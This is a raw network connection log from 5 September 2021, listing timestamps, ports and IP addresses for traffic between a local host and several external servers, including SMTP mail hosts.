Sep 5, 2021 15:50:19.286793947 CEST	423	49821	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:19.301111937 CEST	423	49822	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:19.315531015 CEST	487	49817	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:19.326081991 CEST	423	49820	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:19.326322079 CEST	25	49775	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:19.335829973 CEST	49775	25	192.168.2.4	211.231.108.176
Sep 5, 2021 15:50:19.352804899 CEST	25	49812	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:19.352823973 CEST	25	49812	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:19.364027023 CEST	49812	25	192.168.2.4	67.195.228.111
Sep 5, 2021 15:50:19.393806934 CEST	487	49817	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:19.393829107 CEST	25	49808	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:19.393841028 CEST	25	49808	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:19.393927097 CEST	49808	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:19.397754908 CEST	49817	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:19.397813082 CEST	49817	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:19.403145075 CEST	49808	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:19.456399918 CEST	25	49808	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:19.465168953 CEST	487	49817	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:19.465182066 CEST	487	49817	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:19.465188026 CEST	487	49817	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:19.525104046 CEST	487	49817	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:19.525307894 CEST	49817	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:19.525409937 CEST	49817	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:19.525464058 CEST	49817	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:19.525525093 CEST	49817	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:19.525594950 CEST	49817	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:19.525657892 CEST	49817	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:19.525734901 CEST	49817	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:19.525808096 CEST	49817	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:19.527760029 CEST	25	49812	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:19.527867079 CEST	25	49812	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:19.527909994 CEST	49812	25	192.168.2.4	67.195.228.111
Sep 5, 2021 15:50:19.541906118 CEST	49812	25	192.168.2.4	67.195.228.111
Sep 5, 2021 15:50:19.593372107 CEST	487	49817	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:19.593394995 CEST	487	49817	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:19.593405962 CEST	487	49817	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:19.593416929 CEST	487	49817	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:19.593426943 CEST	487	49817	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:19.593771935 CEST	487	49817	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:19.593811035 CEST	487	49817	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:19.593825102 CEST	487	49817	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:19.632529974 CEST	25	49775	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:19.632644892 CEST	49775	25	192.168.2.4	211.231.108.176
Sep 5, 2021 15:50:19.635735989 CEST	487	49817	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:19.635860920 CEST	487	49817	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:19.635916948 CEST	49817	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:19.636075974 CEST	49817	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:19.703326941 CEST	487	49817	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:19.704771996 CEST	25	49812	67.195.228.111	192.168.2.4
Sep 5, 2021 15:50:19.830212116 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:19.928855896 CEST	49816	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:19.929543018 CEST	49824	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:19.975678921 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:19.975739002 CEST	49820	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:19.975743055 CEST	49818	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:19.975760937 CEST	49821	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:19.975821972 CEST	49822	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:19.976357937 CEST	49825	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:19.976856947 CEST	49826	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:19.977268934 CEST	49827	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:19.977663040 CEST	49828	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:20.002643108 CEST	423	49827	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:20.002666950 CEST	423	49821	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:20.002813101 CEST	49827	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:20.002852917 CEST	49821	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:20.003432989 CEST	423	49816	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:20.003736019 CEST	49816	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:20.004183054 CEST	423	49824	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:20.004280090 CEST	49824	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:20.008466005 CEST	423	49822	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:20.008574963 CEST	49822	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:20.009557962 CEST	423	49828	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:20.009668112 CEST	49828	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:20.017647028 CEST	423	49820	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:20.017750978 CEST	49820	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:20.018762112 CEST	423	49826	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:20.018894911 CEST	49826	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:20.027802944 CEST	423	49827	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:20.028110027 CEST	49827	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:20.041721106 CEST	423	49828	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:20.041963100 CEST	49828	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:20.046669960 CEST	423	49825	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:20.046780109 CEST	49825	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:20.046931028 CEST	423	49818	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:20.047025919 CEST	49818	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:20.048379898 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:20.052783012 CEST	423	49827	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:20.060599089 CEST	423	49826	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:20.073793888 CEST	423	49828	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:20.079085112 CEST	423	49824	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:20.117518902 CEST	423	49825	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:20.161843061 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:20.162065983 CEST	49824	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:20.162169933 CEST	49826	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:20.162287951 CEST	49825	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:20.186733961 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:20.186888933 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:20.186985016 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:20.210459948 CEST	423	49826	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:20.231163025 CEST	423	49825	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:20.235944033 CEST	423	49824	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:20.259219885 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:20.305917025 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:20.306093931 CEST	25	49823	77.75.76.42	192.168.2.4
Sep 5, 2021 15:50:20.306433916 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:20.317730904 CEST	49823	25	192.168.2.4	77.75.76.42
Sep 5, 2021 15:50:20.331302881 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:20.343053102 CEST	25	49823	77.75.76.42	192.168.2.4
Sep 5, 2021 15:50:20.343086004 CEST	25	49823	77.75.76.42	192.168.2.4
Sep 5, 2021 15:50:20.343528032 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:20.343552113 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:20.343570948 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:20.343586922 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:20.343713999 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:20.343741894 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:20.349086046 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:20.350939035 CEST	49823	25	192.168.2.4	77.75.76.42
Sep 5, 2021 15:50:20.366420984 CEST	49827	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:20.371452093 CEST	49830	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:20.391289949 CEST	423	49827	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:20.391396046 CEST	49827	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:20.396614075 CEST	423	49830	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:20.396692991 CEST	49830	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:20.416229963 CEST	25	49823	77.75.76.42	192.168.2.4
Sep 5, 2021 15:50:20.420488119 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:20.420716047 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:20.421120882 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:20.421478033 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:20.422966003 CEST	423	49830	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:20.423160076 CEST	49830	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:20.427632093 CEST	49823	25	192.168.2.4	77.75.76.42
Sep 5, 2021 15:50:20.444549084 CEST	49828	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:20.445004940 CEST	49831	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:20.449215889 CEST	423	49830	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:20.454144001 CEST	25	49823	77.75.76.42	192.168.2.4
Sep 5, 2021 15:50:20.454237938 CEST	49823	25	192.168.2.4	77.75.76.42
Sep 5, 2021 15:50:20.464925051 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:20.465385914 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:20.475759983 CEST	49824	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:20.475786924 CEST	49825	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:20.475847006 CEST	49826	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:20.476233006 CEST	423	49831	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:20.476320982 CEST	49831	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:20.476381063 CEST	49832	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:20.476385117 CEST	423	49828	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:20.476471901 CEST	49828	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:20.476944923 CEST	49833	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:20.477346897 CEST	49834	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:20.495307922 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:20.507767916 CEST	423	49831	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:20.507951975 CEST	49831	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:20.517106056 CEST	423	49826	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:20.517216921 CEST	49826	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:20.517932892 CEST	423	49834	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:20.518014908 CEST	49834	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:20.539174080 CEST	423	49831	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:20.544053078 CEST	423	49833	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:20.544123888 CEST	49833	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:20.545161009 CEST	423	49825	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:20.545233011 CEST	49825	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:20.546004057 CEST	423	49832	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:20.546081066 CEST	49832	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:20.549290895 CEST	423	49824	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:20.549361944 CEST	49824	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:20.558965921 CEST	423	49834	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:20.559241056 CEST	49834	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:20.585061073 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:20.599829912 CEST	423	49834	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:20.612457037 CEST	423	49833	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:20.615755081 CEST	423	49832	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:20.656369925 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:20.688406944 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:20.694441080 CEST	49833	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:20.709629059 CEST	49833	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:20.709902048 CEST	49832	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:20.709903955 CEST	49835	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:20.713162899 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:20.776737928 CEST	423	49833	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:20.778825045 CEST	487	49835	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:20.778918028 CEST	49835	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:20.779361963 CEST	423	49832	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:20.788249969 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:20.793761969 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:20.793781042 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:20.793796062 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:20.793813944 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:20.793831110 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:20.793844938 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:20.793850899 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:20.793901920 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:20.794178963 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:20.795490980 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:20.815828085 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:20.815905094 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:20.816135883 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:20.816154003 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:20.816183090 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:20.816195965 CEST	49830	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:20.816220045 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:20.816709042 CEST	49836	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:20.816894054 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:20.817934036 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:20.817951918 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:20.818010092 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:20.818185091 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:20.819665909 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:20.819684982 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:20.819731951 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:20.819876909 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:20.821439028 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:20.841144085 CEST	423	49830	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:20.841198921 CEST	49830	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:20.841502905 CEST	423	49836	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:20.841561079 CEST	49836	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:20.866653919 CEST	423	49836	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:20.866686106 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:20.866900921 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:20.866934061 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:20.866940975 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:20.867091894 CEST	49836	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:20.867155075 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:20.867423058 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:20.867742062 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:20.872240067 CEST	487	49835	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:20.874666929 CEST	49835	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:20.886157990 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:20.887800932 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:20.887994051 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:20.889239073 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:20.891001940 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:20.892551899 CEST	423	49836	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:20.938184977 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:20.938205004 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:20.943908930 CEST	487	49835	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:20.978684902 CEST	487	49835	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:20.982485056 CEST	49835	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:20.982585907 CEST	49835	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:21.052201986 CEST	487	49835	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:21.052629948 CEST	487	49835	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:21.069540024 CEST	49831	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:21.070296049 CEST	49837	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:21.092749119 CEST	487	49835	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:21.097979069 CEST	487	49835	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:21.098356962 CEST	49835	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:21.098529100 CEST	49835	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:21.098602057 CEST	49835	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:21.098656893 CEST	49835	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:21.098890066 CEST	49835	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:21.098983049 CEST	49835	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:21.099101067 CEST	49835	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:21.099226952 CEST	49835	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:21.099267006 CEST	49835	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:21.100986958 CEST	423	49831	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:21.101082087 CEST	49831	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:21.101990938 CEST	423	49837	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:21.102089882 CEST	49837	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:21.134094000 CEST	423	49837	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:21.134345055 CEST	49837	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:21.166564941 CEST	423	49837	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:21.168339014 CEST	487	49835	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:21.168602943 CEST	487	49835	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:21.168706894 CEST	487	49835	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:21.168960094 CEST	487	49835	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:21.169080019 CEST	487	49835	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:21.169401884 CEST	487	49835	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:21.169801950 CEST	487	49835	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:21.169956923 CEST	487	49835	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:21.170114040 CEST	487	49835	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:21.236645937 CEST	487	49835	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:21.241518974 CEST	49834	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:21.242242098 CEST	49838	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:21.253757954 CEST	487	49835	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:21.253938913 CEST	49835	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:21.254360914 CEST	49835	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:21.283157110 CEST	423	49834	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:21.283257961 CEST	49834	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:21.283366919 CEST	423	49838	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:21.283452988 CEST	49838	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:21.323221922 CEST	487	49835	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:21.325174093 CEST	423	49838	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:21.436310053 CEST	49838	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:21.478732109 CEST	423	49838	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:21.569628954 CEST	49832	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:21.569688082 CEST	49833	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:21.570457935 CEST	49839	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:21.571039915 CEST	49840	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:21.576457024 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.576718092 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.577841043 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.577856064 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.577925920 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.578198910 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.587557077 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.587619066 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.588290930 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.588459015 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.589180946 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.589232922 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.589346886 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.589565992 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.589580059 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.589624882 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.589737892 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:21.616462946 CEST	49836	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:21.616955042 CEST	49841	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:21.636563063 CEST	423	49833	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:21.636634111 CEST	49833	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:21.640185118 CEST	423	49832	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:21.640259981 CEST	49832	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:21.641339064 CEST	423	49836	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:21.641405106 CEST	49836	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:21.641818047 CEST	423	49839	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:21.641920090 CEST	49839	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:21.642044067 CEST	423	49841	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:21.642102957 CEST	49841	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:21.647756100 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.647804976 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.650368929 CEST	423	49840	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:21.650384903 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.650536060 CEST	49840	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:21.660382986 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.664278984 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.664297104 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:21.669516087 CEST	423	49841	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:21.669802904 CEST	49841	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:21.694976091 CEST	423	49841	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:21.713640928 CEST	423	49839	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:21.713867903 CEST	49839	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:21.720117092 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.720139027 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.720150948 CEST	443	49829	172.217.168.67	192.168.2.4
Sep 5, 2021 15:50:21.720242977 CEST	49829	443	192.168.2.4	172.217.168.67
Sep 5, 2021 15:50:21.720609903 CEST	49819	423	192.168.2.4	193.56.146.43
